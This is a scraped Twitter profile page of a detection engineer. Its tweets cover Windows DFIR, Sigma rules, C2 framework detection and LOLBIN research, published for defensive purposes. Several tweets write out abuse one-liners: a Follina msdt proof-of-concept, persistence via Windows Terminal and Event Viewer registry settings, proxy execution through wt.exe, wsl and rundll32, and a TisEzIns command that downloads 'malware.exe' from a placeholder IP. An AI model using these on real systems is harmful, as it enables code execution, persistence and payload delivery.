Nasreddine Bencherchali
@nas_bench
Followers
10,011
Following
1,224
Media
1,249
Statuses
7,383
Detection @nextronsystems | @sigma_hq & LOLDrivers maintainer | Avid learner and passionate about all things #Detection #Sigma
HAL
Joined August 2011
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Rio Grande do Sul
• 201547 Tweets
Madonna
• 156305 Tweets
Bucks
• 74997 Tweets
Dame
• 58630 Tweets
Knicks
• 53496 Tweets
Racing
• 53112 Tweets
Pacers
• 45184 Tweets
Sixers
• 34213 Tweets
#911onABC
• 32151 Tweets
bruno mars
• 28205 Tweets
憲法改正
• 27325 Tweets
Pabllo
• 26750 Tweets
dua lipa
• 22312 Tweets
Giannis
• 21496 Tweets
Rony
• 20947 Tweets
Bruins
• 15629 Tweets
Anne Hathaway
• 15150 Tweets
Costas
• 14848 Tweets
Lillard
• 14237 Tweets
#SnowMan結成12周年
• 13473 Tweets
76ers
• 12529 Tweets
Arias
• 12285 Tweets
Estevão
• 11858 Tweets
#LeafsForever
• 11422 Tweets
Talleres
• 10575 Tweets
Last Seen Profiles
Since everyone patches systems based on what infosec twitter is currently hyping. We should do a weekly hype for old vulnerabilities and pretend that they are new then maybe people will care.
23
127
1K
"Svchost.exe" Mind Map covering its cmdline options, logs and "normal" behavior.
Link:
#Detection
#BlueTeam
#Windows
8
290
939
Here is a stupid way to persist on a machine using WindowsTerminal profiles.
1-Modify the "settings.json" located in %localappdata% and add a custom profile that contains your payload
2-Change the "defaultProfile" value and put your GUID
3-Add the value "startOnUserLogin": true
12
242
853
3
311
834
If you have Symantec SEP installed you can use the "Symantec.SSHelper" COM object to launch processes and download arbitrary files.
The "User-Agent: Symantec Agent" can be used to identify requests made by the "HIDownloadURLFile"
14
333
811
In addition to the documented "-e/--exec" flag in
#lolbas
about the "wsl.exe" binary (). We can also use the "--system" flag to run Linux (as root) /Windows commands.
wsl --system [Command]
9
191
653
A quick DFIR tip for the weekend
Now that notepad on Win 11 saves its states and can open tabs. It means history is saved somewhere :)
Well that somewhere is in %localappdata%\Packages\Microsoft.WindowsNotepad_8wekyb3d8bbwe\LocalState\TabState
A new location to monitor and…
7
155
655
Windows Services (Creation) Mind Map covering service creation and detection methods.
Link:
#Detection
#BlueTeam
#Windows
#Services
4
237
652
By creating the key "telnet.exe" in the "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths" registry and setting the "Default" key to any executable. We can call it by running the command:
rundll32.exe url.dll,TelnetProtocolHandler
4
179
637
We need blue team people to start writing malware that can move laterally and persist and all that good shit but the payload is to enable PowerShell logging and install Sysmon 😂
33
70
595
6
275
592
The calc button on the keyboard, also known as the ultimate POC button. Necessary for any live demo "Just in case"
17
34
472
In this blog post, i take a look at some of the lesser known
#Windows
Event Log files and try to find interesting artifacts for
#DFIR
and
#ThreatHunting
Thanks for reading.
Feedback is really appreciated.
10
171
453
PowerShell has a list of suspicious keywords. If found in a script block an automatic 4104 event will be generated regardless of logging policy :) (True for both PWSH 5/7)
Look for EID 4104 with Level 3 (Warning)
Full List:
8
134
440
I created a new project called C2-Matrix-Indicators that aims to take a code review approach to extract detections/indicators out of the C2's listed in the
@c2_matrix
Feedback and contributions are highly appreciated.
LINK:
#BlueTeam
#detection
#infosec
4
160
428
One thing I dislike about Windows file "properties". Is that it chose to hide or show some information depending on the extension of the file.
For example a ".cpl" has an original filename field but if you inspect it won't show it. Change the extension to ".dll" and its now…
17
27
412
msdt
#follina
run from CLI directly doesn't require the "IT_RebrowseForFile" nor "ms-msdt". See minimal POC below
msdt /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
6
135
393
Real life infosec reminder :
- Most companies dont have detection teams. At best AV with old sig.
- Servers are not updated every month. Most still have Win7 and 2008
- Most stuff is left in default config state.
- If they have 💰. Then, buy leader in Gartner and leave it as is.
12
75
391
#log4j
thread
Detection Ideas + Yara by
@cyb3rops
-
Hashes for vulnerable LOG4J versions by
@mubix
-
SIGMA by
@SOC_Prime
-
Payloads list by
@GreyNoiseIO
-
3
191
393
Billion $$$ industry Vs person with some free time 😂
7
76
382
Just msedgewebview2 casually executing
"cmd.exe /S /C \"\"chcp\" 437>nul 2>&1 & \"C:\\WINDOWS\\System32\\whoami.exe\" /groups\""
14
53
384
First blog of 2021
Common Tools & Techniques Used By Threat Actors and Malware — Part I
If you're starting as a threat hunter or a detection engineer give this a read.
Feedback is appreciated.
#threathunting
#BlueTeam
#detection
#engineering
2
134
375
To get people into blue teaming. We need a series similar to Mr. Robot but the main character is a blue teamer/EDR admin. Deploying GPOs and answering support tickets and tuning FP.
Make that exciting Netflix😅
39
42
369
Look mom I've made it to a SANS poster 🥳
Thank you 🙏
#Windows
Third-Party
#AppsForensics
Reference Guide provides a detailed exploration of artifacts from 46 third-party applications commonly found on devices running the Windows operating system.
Download:
Download in Portuguese:
0
53
132
9
55
363
As a detection engineer writing detections for a product. You'll face the reality that you need to write the same detection using multiple sources
- Security Log
- Sysmon
- PowerShell Scriptblock (if its powershell related)
- Kernel / EDR source
- ETW counterpart Kernel-Process…
19
48
348
Created a new repository that contains resources (blogs, slides, talks...) to learn and understand SIGMA Rules.
If you have any related resources please feel free to contribute.
#sigma
#detection
#infosec
#resources
2
103
342
MAL-CL has now coverage for more than 40+ different tools. Every tool has
➡️MITRE Mapping.
➡️Detections (Splunk, Sigma, Elastic, Azure) when possible.
➡️Common Command-lines
➡️Sandbox Execution & Event logs to monitor
And much more to come.
Github:
3
106
326
Use "wt.exe" or "WindowsTerminal.exe" as a
#lolbin
to proxy execution
wt.exe [command]
WindowsTerminal.exe [command]
1
88
307
Here is a quick write-up for one of the most convoluted LOLBINs to setup.
StandaloneRunner.exe is a utility included with the Windows Driver Kit (WDK) used for testing and debugging drivers on Windows systems.
It calls to a function named "RunCommand" that directly allows the…
7
102
302
[New Blog] I just published "Symantec Endpoint Protection Meets COM — Using “Symantec.SSHelper” As A LOLBIN" detailing how I found the Symantec.SSHelper
#lolbin
and the many features it offers.
Feedback is appreciated as always 🙏
4
144
288
I'm here to remind you that the most underrated and slept on C2 is actually Merlin.
Been there for a long time and still have a very low detection rate across the board.
You all be underestimating the power of low detections with go based stuff.
11
48
290
HERE WE GO AGAIN 😩
26
31
279
2
100
283
I feel many people should actually work in the front line of defense. With broken SIEMs, unmanaged and underpaid teams, missing logs, broken workflows...etc.
Many, and I mean many talk from their Ivory tower 6/7 figure job with the best, and taking one continent they live in or…
24
33
275
A Deep Dive Into ‘DLLHOST.EXE’ - What is the ‘DLLHOST.EXE’ Process Actually Running
#Malware
#ThreatHunting
#Windows
#Internals
1
136
274
As we all know, true APTs and TAs avoid using "whoami" as its a sign of weakness.
So here is a thread of 14 examples of APTs and TAs executing it over the years.
MosesStaff By Checkpoint
1/🧵
7
62
259
MindMap I made a wile back covering some of the common windows system processes, their parent/child relationship and default behavior.
Link:
#Detection
#BlueTeam
4
72
228
#MalwareAnalysisTip
If you see the "/e:VBScript.Encode" flag in a command line. This "indicates" that the file is an encoded VBS
You can use the following tools to decode it :
1)
2)
Examples:
3
72
221
I'm really excited and delighted to share that I have joined
@nextronsystems
as Threat Researcher. Super stoked to work with
@cyb3rops
and the team and provide more blueness to the world 💙😁
45
4
213
🧙♂️Introducing SigmaHQ GUI 🧙♂️
This tool was built specifically to easily create and update Sigma Security Content. Get started now and start exploring and creating rules ->
Read more about the tool in this release blog ->
⚒️…
6
77
214
Took some time to put the discussion from the thread below into a more coherent and digestible format.
TL;DR - If you're interested how UWP and Windows desktop apps (store and other) are able to start on startup of windows without touching the Run key or any typical persistence…
@James_inthe_box
@Hexacorn
@joshlemon
Small update :)
While the tangent we went on was good, I think I found the real culprit.
WindowsApps (Appx) have a special key to create startup tasks. Its in "HKEY_CURRENT_USER\Software\Classes\Local…
2
16
52
4
71
207
Did you know that when you disable "Real-time protection" on defender, its true that you won't receive events on the Defender Event log anymore (related to that feature).
But if you actually subscribe to the AMSI ETW {2A576B87-09A7-520E-C21A-4942F0271D67} provider you'd still…
4
54
213
You can use the "Microsoft-Windows-Services-Svchost"
#ETW
provider to spot fake "svchost" processes as this provider will only track services started via the legitimate svchost. If it's not showing up then it's worth looking into.
#threathunting
#dfir
2
59
207
Following
@SwiftOnSecurity
amazing thread ().
I’ve compiled some the tools mentioned in it with their corresponding links in the thread below (For reference and easy find).
What are some good utilities/tools that you don't think other people know about? They can be commercial.
382
332
2K
4
38
200
EDRs/AVs sometimes trust certain locations or perform certain behavior when met with unexpected weirdness. Here are some ideas to check/test for, the next time you have some alone time with your solution
1/🧵
4
53
204
I love it when threat actors are old-school users of Windows. Instead of traditional methods to enumerate local groups on a machine, the TA used the "local.exe" utility that's part of the "Windows 2000 Resource Kit Tools".
4
38
198
It's physically impossible to keep up with the research being released nowadays. Basically life becomes a mix of FOMO, Imposter Syndrome and eventual burnout😭
What's the solution you might ask? Welp it turns out, no one is actually keeping up with everything. 😂Everyone is…
8
36
196
[COMING SOON]
Atomic Red Team 🐦 Integration is coming to SigmaHQ 🧙♂️
Sigma rules will be validated regularly against atomics directly in the Sigma CI pipelines to ensure even more quality.
Will share more in time 🔥
6
47
194
If you use PowerShell 7. Know that logging is not in the usual "Microsoft-Windows-PowerShell/Operational" but instead in "PowerShellCore/Operational". That you need to enable. Use "RegisterManifest.ps1" and "InstallPSCorePolicyDefinitions.ps1" to get it
6
78
193
4
63
193
Finally a REAL APT not that Kaspersky weird stuff 😂
5
33
191
I think it's high time we stopped fucking around and pretending security is working. We've been getting high severity vulnerabilities every couple of days for the last 6-7 months it's not even funny anymore.
No amount of 100% coverage will save you. So let's get a grip and stop…
25
16
188
In my stupid quest to find
#lolbin
's in any software, here is one that's part of the "Advanced Installer" software that conveniently has the description
"File that launches another file"
viewer.exe /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "Command" [Args]
It's also signed.
4
44
183
Persistence via Event Viewer help link😅using "\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer\"
Add "MicrosoftRedirectionProgram" with your program and add "ConfirmUrl" to 1 to avoid prompt
3
40
184
[New Blog] Understanding & Detecting C2 Frameworks — BabyShark 🦈 by
@UnkL4b
- Server written in Python / Flask.
- Uses Google Translator as a proxy to send commands.
@c2_matrix
#blue_team
#redteam
#C2Matrix
1
63
183
If you're not reading
@DebugPrivilege
blog. You're literally missing out on a ton of amazing information.
1
35
181
I love how when someone shares an offensive tool he gets praised. But when a blue teamer shares a detection he's told that it's bypassable/weak. 🤫
14
10
179
Here is a nice
#lolbas
#LOLScript
part of VStudio install (Launch-VsDevShell). Has n IEX call that accepts passed args via "-VsWherePath" and "-VsInstallationPath" flags. 🧵1/3
.\Launch-VsDevShell.ps1 -VsWherePath 'C:\Windows\System32\calc.exe'
#lolbin
2
45
178
If you're doing
#dfir
on a machine that has a WSL distro installed. Don't forget the check the "ext4.vhdx" for any susp activity intiated from there. Even on a live system you can open the file using 7Zip for example and check the ".bash_history" among other things :)
#detection
2
61
178
Honest question. If you're C2 "bypasses" all EDR's. What's the recommendation in your red team report?
40
20
178
[New Blog] Understanding & Detecting C2 Frameworks — DarkFinger-C2 by
@hyp3rlinx
- Server written in Python.
- Agent written in Batch.
- Uses "Finger.exe" utility as a C2 channel.
@c2_matrix
#BlueTeam
#redteam
#C2Matrix
1
59
174
One of the best things to invest in if you're building detections is to baseline server/service child processes.
More often than not, all entry vectors (RCE, Phish...etc) will spawn a "suspicious" child process.
From "java" and "tomcat" to "winword" and "svchost" 🧵
8
35
175
[Blog 📚] LOLBINed - Abusing Sysinternals BgInfo
An additional abuse vector, for a
#LOLBIN
first discovered by
@Oddvarmoe
#lolbas
5
68
170
Shocker news but if you're building detections don't focus on the new an shiny as it probably won't affect you. Instead prioritize building the fundamental of detection such as renamed sys binaries, susp child processes, exec form susp locations, etc. These will help you forever
7
41
170
Let's breakdown some easy [host-based] wins from the SNAKE report with some SIGMA detections.
#snakemalware
1- Persistence via Service [T1543.003] + Service Execution
I got a Work In Progress PR
@sigma_hq
based on this report. Targeting IOCs and different ideas mentioned here and there.
Follow this stream for a list of rules to hunt for this :)
2
26
67
3
71
171
[New Blog] Understanding & Detecting C2 Frameworks — Ares
In this new series. I'll be diving into and exploring different C2 frameworks. To offer some understanding and detection opportunities for out of the box usage and configurations.
3
52
166
The
@TheDFIRReport
is one of the best thing that happened to this industry. Providing extremely detailed reports with an extreme level of detail for every step. Showcasing what happens in the every day attacks that millions of people face.
The best part is that it keeps on…
7
26
169
I wonder how many detections, malware, and software would break if it's just "D:\" instead of "C:\"
8
16
163
News flash! Your built in EDR rules aren't enough and worst of all you can't even update or understand what they detect.
Some might say. I use validation method so I know what they're detecting. You're only confirming a subset of certain implementation of ttps. So check again.…
18
40
166
I've been playing with the "Microsoft-Windows-Search-Core" ETW provider and I found some interesting stuff regarding the "search-ms" thingy. So full queries are logged in EID 51. Exp running "search-ms:query=" from the Windows "Run" you get the following event. 🧵1/4
2
53
158
This is a thread compiling different threads, blogs, and help offered by the infosec community related to the current situation. If you have additional links put them here. 🧵
5
58
158
[Blog 🪡] In this new blog series I'm calling "Behind The Detection", I'll be sharing some tips and ideas on building detections using SIGMA.
In this introductory post, I take a look at some schtasks examples and give a taste of what's to come.
#blueteam
2
49
157
TisEzIns a binary bundled with Trend Micro installer that "Helps download the Trend Micro software installer" can be abused to download arbitrary files.
#lolbin
TisEzIns.exe /b /u "
http://IP/malware.exe"
/f "C:\path\to\save\malware.exe"
Read More:
4
55
155
I love how APTs use the latest and greatest zero days and bypasses for entry and persistence. And then you have rundll32 executing files from Windows\Temp with a .txt extension 😅 got bored in the middle of the operation.
12
21
148
Added some new
#sigma
rules based on the latest
@TheDFIRReport
related to MSSQL and other goodness. Check out the sigma repo for the full list
SELECT XMRig FROM SQLServer
➡️Initial Access: Brute Force
➡️Execution: xp_cmdshell, batch scripts, certutil
➡️Persistence: Hidden accounts, schtasks, WMI event subscription via mof files
➡️Defense Evasion: Kill AVs, Disabling UAC
➡️Impact: XMRig Miner
1
94
215
1
50
147
[Blog] LOLBINed — Using Kaspersky Endpoint Security ‘KES’ Installer to Execute Arbitrary Commands
An interesting set of issues I found at the start of the year in the KES installer and related products.
Enjoy 😁
4
45
148